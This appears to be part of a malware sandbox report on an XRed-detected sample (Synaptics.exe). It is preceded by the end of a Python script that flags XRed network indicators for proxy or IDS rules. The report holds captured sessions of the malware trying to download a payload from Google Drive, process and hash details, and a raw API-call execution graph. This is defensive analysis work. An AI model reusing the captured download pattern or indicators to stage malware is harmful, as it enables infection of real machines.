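    if host == "freedns.afraid.org" and "action=getdyndns" in path:
        hits.append("freedns_getdyndns_api")
    # 2. Google Drive direct-download URL fetched by something that is not a browser.
    if (host in ("docs.google.com", "drive.usercontent.google.com")
            and "export=download" in path and not ua.startswith("Mozilla/")):
        hits.append("gdrive_download_nonbrowser_ua")
    # 3. The two hard-coded User-Agent strings observed in this capture.
    if ua in ("MyApp", "Synaptics.exe"):
        hits.append("xred_user_agent")
    return hits


def decode_chunked(hex_dump: str) -> bytes:
    """Decode a Transfer-Encoding: chunked body given as a space-separated hex dump."""
    data = bytes.fromhex(hex_dump)
    out = bytearray()
    pos = 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)  # drop any chunk extension
        pos = end + 2
        if size == 0:  # zero-length chunk terminates the body
            break
        out += data[pos:pos + size]
        pos += size + 2  # skip the CRLF that closes each chunk
    return bytes(out)


def scan(requests: List[str]) -> List[Tuple[str, List[str]]]:
    """Run the indicator checks over raw requests and keep only those with hits."""
    results: List[Tuple[str, List[str]]] = []
    for raw in requests:
        hits = flag_request(raw)
        if hits:
            _method, path, headers = parse_request(raw)
            results.append((headers.get("host", "") + path, hits))
    return results


if __name__ == "__main__":
    for target, hits in scan(SAMPLE_REQUESTS):
        print(target, "->", ", ".join(hits))
    print(decode_chunked(FREEDNS_REPLY_HEX))
```

The User-Agent check is the weakest of the three indicators (trivially changed between builds); the FreeDNS `getdyndns` API call and a Drive `export=download` fetch from a non-browser client are the patterns worth carrying into a proxy or IDS rule.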


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 50024 | 142.250.184.238 | 443 | 7364 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:38:54 UTC | 344 | OUT |
  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Host: docs.google.com
  Cache-Control: no-cache
  Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
2025-01-02 19:38:55 UTC | 1314 | IN |
  HTTP/1.1 303 See Other
  Content-Type: application/binary
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Thu, 02 Jan 2025 19:38:54 GMT
  Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
  Strict-Transport-Security: max-age=31536000
  Cross-Origin-Opener-Policy: same-origin
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Content-Security-Policy: script-src 'report-sample' 'nonce-Os7Hnvnya8oo3bkEnMJeWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Server: ESF
  Content-Length: 0
  X-XSS-Protection: 0
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 50025 | 142.250.185.97 | 443 | 7364 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:38:55 UTC | 387 | OUT |
  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
  Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
2025-01-02 19:38:56 UTC | 1243 | IN |
  HTTP/1.1 404 Not Found
  X-GUploader-UploadID: AFiumC6A28wtMAypMUfN65dy_3-vAh4CsIODc516Ohuug12TEwPqshOxGb5qediKdLFaray1
  Content-Type: text/html; charset=utf-8
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Thu, 02 Jan 2025 19:38:56 GMT
  Cross-Origin-Opener-Policy: same-origin
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Content-Security-Policy: script-src 'report-sample' 'nonce-NYOikIDt8jRF7wIiCKzr-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Content-Length: 1652
  Server: UploadServer
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Content-Security-Policy: sandbox allow-scripts
  Connection: close
2025-01-02 19:38:56 UTC | 147 | IN |
  Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:38:56 UTC | 1390 | IN |
  Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 6a 59 43 4a 5a 30 72 56 41 6e 5f 59 72 33 2d 33 36 76 70 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
  Data Ascii: t Found)!!1</title><style nonce="kjYCJZ0rVAn_Yr3-36vpCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:38:56 UTC | 115 | IN |
  Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
  Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 50027 | Destination IP: 142.250.184.238 | Destination Port: 443 | PID: 7364 | Process: C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:38:56 UTC | 344 bytes | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
2025-01-02 19:38:57 UTC | 1314 bytes | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 02 Jan 2025 19:38:57 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-ewO_hDhg--ylvh0JOWU4lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 50029 | Destination IP: 142.250.185.97 | Destination Port: 443 | PID: 7364 | Process: C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:38:58 UTC | 387 bytes | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
2025-01-02 19:38:58 UTC | 1243 bytes | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC4nIj-xFHayWQlLPQMIEN6VRTOWSws6WCBYkU9pKfPjOxbD7UolSx0sYbijBEYaJvdP
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 02 Jan 2025 19:38:58 GMT
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'report-sample' 'nonce-yednUhlFkoA8wB6tRtwLSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2025-01-02 19:38:58 UTC | 147 bytes | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:38:58 UTC | 1390 bytes | IN | Data Ascii: t Found)!!1</title><style nonce="xDHj-wi5GuueQlAnJeFd8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:38:58 UTC | 115 bytes | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                              Target ID:0
                                                                                              Start time:14:37:43
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'059'840 bytes
                                                                                              MD5 hash:EABA5B2C3B6607177112EC5F26438BA3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:14:37:44
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\Desktop\._cache_file.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\._cache_file.exe"
                                                                                              Imagebase:0x1000000
                                                                                              File size:288'088 bytes
                                                                                              MD5 hash:FD6057B33E15A553DDC5D9873723CE8F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:14:37:44
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                              Imagebase:0x400000
                                                                                              File size:771'584 bytes
                                                                                              MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 92%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:4
                                                                                              Start time:14:37:44
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              Imagebase:0xd90000
                                                                                              File size:498'688 bytes
                                                                                              MD5 hash:EAA6B5EE297982A6A396354814006761
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:5
                                                                                              Start time:14:37:45
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                              Imagebase:0x590000
                                                                                              File size:53'161'064 bytes
                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:9
                                                                                              Start time:14:38:04
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:771'584 bytes
                                                                                              MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:14:39:48
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\splwow64.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                                                              Imagebase:0x7ff7e5a30000
                                                                                              File size:163'840 bytes
                                                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false


                                                                                                Execution Graph

                                                                                                Execution Coverage:20%
                                                                                                Dynamic/Decrypted Code Coverage:79.8%
                                                                                                Signature Coverage:22.3%
                                                                                                Total number of Nodes:913
                                                                                                Total number of Limit Nodes:40
3028->3029 3031 1005b32 3 API calls 3029->3031 3030->3021 3032 1001d43 3031->3032 3032->3027 3033 1001c7f 3 API calls 3032->3033 3033->3032 3035 10041f3 3034->3035 3036 100420d 3034->3036 3037 10038cc 24 API calls 3035->3037 3036->3035 3038 1004222 3036->3038 3049 1004208 3037->3049 3039 1004360 3038->3039 3038->3049 3117 1002691 3038->3117 3041 100445b 3039->3041 3043 10043be MessageBeep 3039->3043 3039->3049 3042 10038cc 24 API calls 3041->3042 3042->3049 3044 1005d22 6 API calls 3043->3044 3045 10043cb 3044->3045 3046 10043de MessageBoxA 3045->3046 3047 1005cd4 EnumResourceLanguagesA 3045->3047 3046->3049 3047->3046 3049->2900 3050 100168b 3049->3050 3051 10016b8 3050->3051 3056 100179c 3050->3056 3148 10015f6 LoadLibraryA 3051->3148 3054 10016c9 GetCurrentProcess OpenProcessToken 3055 10016e4 GetTokenInformation 3054->3055 3054->3056 3057 1001790 CloseHandle 3055->3057 3058 1001700 GetLastError 3055->3058 3056->2900 3068 1004161 FindResourceA 3056->3068 3057->3056 3058->3057 3059 100170f LocalAlloc 3058->3059 3060 1001720 GetTokenInformation 3059->3060 3061 100178f 3059->3061 3062 1001733 AllocateAndInitializeSid 3060->3062 3063 1001788 LocalFree 3060->3063 3061->3057 3062->3063 3066 1001754 3062->3066 3063->3061 3064 100177f FreeSid 3064->3063 3065 100175b EqualSid 3065->3066 3067 1001772 3065->3067 3066->3064 3066->3065 3066->3067 3067->3064 3069 10041b1 3068->3069 3070 100417c LoadResource 3068->3070 3072 10038cc 24 API calls 3069->3072 3070->3069 3071 100418a DialogBoxIndirectParamA FreeResource 3070->3071 3071->3069 3073 10041c1 3071->3073 3072->3073 3073->2878 3076 1005bf2 3075->3076 3077 1005c15 3076->3077 3079 1005c07 CharNextA 3076->3079 3090 1005ad3 3076->3090 3077->2972 3079->3076 3081 1005b47 CharPrevA 3080->3081 3082 1005b54 lstrcpyA 3080->3082 3081->3082 3082->2991 3085 1002868 lstrlenA 3084->3085 3086 1002874 3084->3086 3085->3086 3086->2991 3088 10038cc 24 API calls 3087->3088 3089 10018b4 3088->3089 3089->2981 3089->2982 3091 1005ae9 3090->3091 
3092 1005ade IsDBCSLeadByte 3090->3092 3091->3076 3092->3091 3094 1002ac7 3093->3094 3095 1002aaf LoadStringA 3093->3095 3094->2999 3094->3000 3095->3094 3097 1005d45 GetVersionExA 3096->3097 3104 1003914 3096->3104 3098 1005d65 3097->3098 3097->3104 3099 1005d83 GetSystemMetrics 3098->3099 3098->3104 3100 1005d8f RegOpenKeyExA 3099->3100 3099->3104 3101 1005dae RegQueryValueExA RegCloseKey 3100->3101 3100->3104 3102 1005ddb 3101->3102 3101->3104 3111 1005c1c 3102->3111 3104->3012 3105 1005cd4 3104->3105 3106 1005ce0 3105->3106 3109 1005d0b 3105->3109 3115 1005c9f EnumResourceLanguagesA 3106->3115 3108 1005cf7 3108->3109 3116 1005c9f EnumResourceLanguagesA 3108->3116 3109->3012 3112 1005c23 3111->3112 3113 1005c4f CharNextA 3112->3113 3114 1005c5d 3112->3114 3113->3112 3114->3104 3115->3108 3116->3109 3118 10027d0 3117->3118 3128 10026b1 3117->3128 3120 10027f1 3118->3120 3121 10027e8 GlobalFree 3118->3121 3120->3039 3121->3120 3122 10026e8 GetFileVersionInfoSizeA 3123 10026ff GlobalAlloc 3122->3123 3122->3128 3123->3118 3124 1002713 GlobalLock 3123->3124 3124->3118 3125 1002724 GetFileVersionInfoA 3124->3125 3126 1002737 VerQueryValueA 3125->3126 3127 10027a9 GlobalUnlock 3125->3127 3126->3127 3126->3128 3127->3128 3128->3118 3128->3122 3128->3127 3129 10027f8 GlobalUnlock 3128->3129 3130 1002081 3128->3130 3129->3118 3131 10020a3 CharUpperA CharNextA CharNextA 3130->3131 3132 100218c GetSystemDirectoryA 3130->3132 3131->3132 3133 10020c7 3131->3133 3135 100219e 3132->3135 3136 10020d0 lstrcpyA 3133->3136 3137 100217e GetWindowsDirectoryA 3133->3137 3138 10021ad 3135->3138 3140 1005b32 3 API calls 3135->3140 3139 1005b32 3 API calls 3136->3139 3137->3135 3138->3128 3141 10020f9 RegOpenKeyExA 3139->3141 3140->3138 3141->3135 3142 100211e RegQueryValueExA 3141->3142 3143 1002173 RegCloseKey 3142->3143 3144 100213d 3142->3144 3143->3135 3145 1002143 ExpandEnvironmentStringsA 3144->3145 3146 1002166 3144->3146 3145->3146 3147 1002158 lstrcpyA 3145->3147 3146->3143 
3147->3146 3149 1001683 3148->3149 3150 1001627 GetProcAddress 3148->3150 3149->3054 3149->3056 3151 1001679 FreeLibrary 3150->3151 3152 100163a AllocateAndInitializeSid 3150->3152 3151->3149 3153 1001678 3152->3153 3154 1001668 FreeSid 3152->3154 3153->3151 3154->3153 3157 1002a34 6 API calls 3156->3157 3158 1003dad LocalAlloc 3157->3158 3159 1003dc1 3158->3159 3160 1003ddd 3158->3160 3161 10038cc 24 API calls 3159->3161 3162 1002a34 6 API calls 3160->3162 3163 1003dd1 3161->3163 3164 1003de5 3162->3164 3165 1003547 3 API calls 3163->3165 3166 1003de9 3164->3166 3167 1003e0c lstrcmpA 3164->3167 3168 1003dd6 3165->3168 3169 10038cc 24 API calls 3166->3169 3170 1003e28 3167->3170 3171 1003e1c LocalFree 3167->3171 3173 1003e23 3168->3173 3174 1003df9 LocalFree 3169->3174 3172 10038cc 24 API calls 3170->3172 3171->3173 3175 1003e39 LocalFree 3172->3175 3173->2910 3173->2913 3173->2934 3174->3173 3175->3168 3177 1002a34 6 API calls 3176->3177 3178 1003d25 3177->3178 3179 1003d2c 3178->3179 3180 1003d62 3178->3180 3182 10038cc 24 API calls 3179->3182 3181 1002a34 6 API calls 3180->3181 3183 1003d73 3181->3183 3184 1003d3c 3182->3184 3339 1003566 wsprintfA FindResourceA 3183->3339 3185 1003d91 3184->3185 3185->2915 3188 1003d81 3190 10038cc 24 API calls 3188->3190 3189 1003d95 3189->2915 3190->3185 3192 1002a34 6 API calls 3191->3192 3193 1005651 LocalAlloc 3192->3193 3194 1005667 3193->3194 3195 1005688 3193->3195 3196 10038cc 24 API calls 3194->3196 3197 1002a34 6 API calls 3195->3197 3198 1005677 3196->3198 3199 1005690 3197->3199 3202 1003547 3 API calls 3198->3202 3200 1005694 3199->3200 3201 10056b7 lstrcmpA 3199->3201 3203 10038cc 24 API calls 3200->3203 3204 10056d0 LocalFree 3201->3204 3205 10056ca 3201->3205 3206 100567c 3202->3206 3207 10056a4 LocalFree 3203->3207 3208 10056e0 3204->3208 3209 100571b 3204->3209 3205->3204 3228 1005681 3206->3228 3207->3228 3215 1004b1a 63 API calls 3208->3215 3210 10058db 3209->3210 3211 1005735 GetTempPathA 3209->3211 3212 
1004161 28 API calls 3210->3212 3213 1005769 3211->3213 3214 100574a 3211->3214 3212->3228 3218 100577a lstrcpyA 3213->3218 3221 100578d GetDriveTypeA 3213->3221 3222 10058ad GetWindowsDirectoryA 3213->3222 3213->3228 3346 1004b1a 3214->3346 3217 1005702 3215->3217 3220 1005706 3217->3220 3217->3228 3218->3213 3223 10038cc 24 API calls 3220->3223 3224 10057a0 GetFileAttributesA 3221->3224 3237 100579b 3221->3237 3381 1003f0d 3222->3381 3223->3206 3224->3237 3228->2921 3228->2934 3239 1004112 GetWindowsDirectoryA 3228->3239 3229 1004b1a 63 API calls 3229->3213 3230 1001f6e 25 API calls 3230->3237 3232 1005833 GetWindowsDirectoryA 3232->3237 3233 1003f0d 40 API calls 3233->3237 3234 1005b32 3 API calls 3234->3237 3236 1005874 SetFileAttributesA lstrcpyA 3238 1004b1a 63 API calls 3236->3238 3237->3213 3237->3224 3237->3228 3237->3230 3237->3232 3237->3233 3237->3234 3237->3236 3374 1005e13 3237->3374 3378 1001f4b GetFileAttributesA 3237->3378 3238->3237 3240 1004131 3239->3240 3241 100414f 3239->3241 3242 10038cc 24 API calls 3240->3242 3243 1003f0d 40 API calls 3241->3243 3244 1004141 3242->3244 3245 100415f 3243->3245 3246 1003547 3 API calls 3244->3246 3245->2929 3247 1004146 3246->3247 3247->2929 3249 100520f 3248->3249 3249->3249 3250 1005256 3249->3250 3251 100522f 3249->3251 3452 10049db 3250->3452 3253 1004161 28 API calls 3251->3253 3254 1005254 3253->3254 3255 1003566 9 API calls 3254->3255 3256 100525f 3254->3256 3255->3256 3256->2924 3258 1001f03 3257->3258 3259 1001f2c 3257->3259 3261 1001f20 3258->3261 3262 1001f08 3258->3262 3601 1001ddf GetWindowsDirectoryA 3259->3601 3596 1001ea3 RegOpenKeyExA 3261->3596 3264 1001f1e 3262->3264 3591 1001e52 RegOpenKeyExA 3262->3591 3264->2935 3267 10052ad 3266->3267 3276 10052e8 3266->3276 3268 1002a34 6 API calls 3267->3268 3269 10052be 3268->3269 3271 10052c7 3269->3271 3269->3276 3270 1005400 lstrcpyA 3270->3276 3272 10038cc 24 API calls 3271->3272 3300 10052d7 3272->3300 3274 1002a34 6 API calls 3274->3276 3275 
